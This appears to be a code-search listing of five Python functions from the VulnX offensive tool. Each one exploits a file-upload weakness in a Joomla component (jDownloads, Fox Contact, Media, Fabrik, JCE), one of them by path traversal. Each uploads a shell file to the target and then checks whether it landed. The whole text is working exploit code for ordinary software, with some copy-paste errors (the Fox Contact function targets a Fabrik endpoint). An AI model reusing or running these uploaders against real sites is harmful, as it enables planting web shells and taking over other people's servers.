Example #1
0
def joomla_comjdownloads(url, headers, timeout):
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "index.php?option=com_jdownloads&Itemid=0&view=upload"
    headers = {"content-type": ["form-data"]}
    files = open('./shell/VulnX.zip', 'rb')
    shell = open('./shell/VulnX.gif', 'rb')
    data = {
        'name': 'Tig',
        'mail': '*****@*****.**',
        'filetitle': 'Tig',
        'catlist': '1',
        'license': '0',
        'language': '0',
        'system': '0',
        'file_upload': files,
        'pic_upload': shell,
        'description': '<p>zot</p>',
        'senden': 'Send file',
        'option': 'com_jdownloads',
        'view': 'upload',
        'send': '1',
        '24c22896d6fe6977b731543b3e44c22f': '1'
    }
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Vuln X', response):
        print(' %s Com Jdownloads        %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Jdownloads        %s' % (que, failexploit))
Example #2
0
def joomla_foxcontact(url, headers, timeout):
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'

    #    foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
    #            'index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
    #            'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}

    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    }
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Fox Contact            %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s fox Contact            %s' % (que, failexploit))
Example #3
0
def joomla_comedia(url, headers, timeout):
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
    headers = {"content-type": ["form-data"]}
    fieldname = 'Filedata[]'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    }
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Com Media             %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Media             %s' % (que, failexploit))
Example #4
0
def joomla_fabrik2_d(url, headers, timeout):
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

    headers = {"content-type": ["form-data"]}
    fieldname = 'file'
    shell = open('./shell/VulnX.txt', 'rb')
    data = {
        fieldname: shell,
    }
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = endpoint + "/images/XAttacker.txt"
    response = vxget(path_shell, headers, timeout)
    if re.findall(r'Tig', response):
        print(' %s Com Fabrik2            %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Fabrik2            %s' % (que, failexploit))
Example #5
0
def joomla_comjce(url, headers, timeout):
    host = hostd(url)
    headers[
        'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    data = {
        'upload-dir': './../../',
        'upload-overwrite': 0,
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload',
    }
    content = vxpost(endpoint, data, headers, timeout)
    path_shell = url + "/VulnX.gif"
    res = requests.get(path_shell, headers).text
    matches = re.findall(re.compile(r'/image/gif/'), res)
    if matches:
        print(' %s Com Jce               %s    %s' %
              (que, vulnexploit, path_shell))
    else:
        print(' %s Com Jce               %s' % (que, failexploit))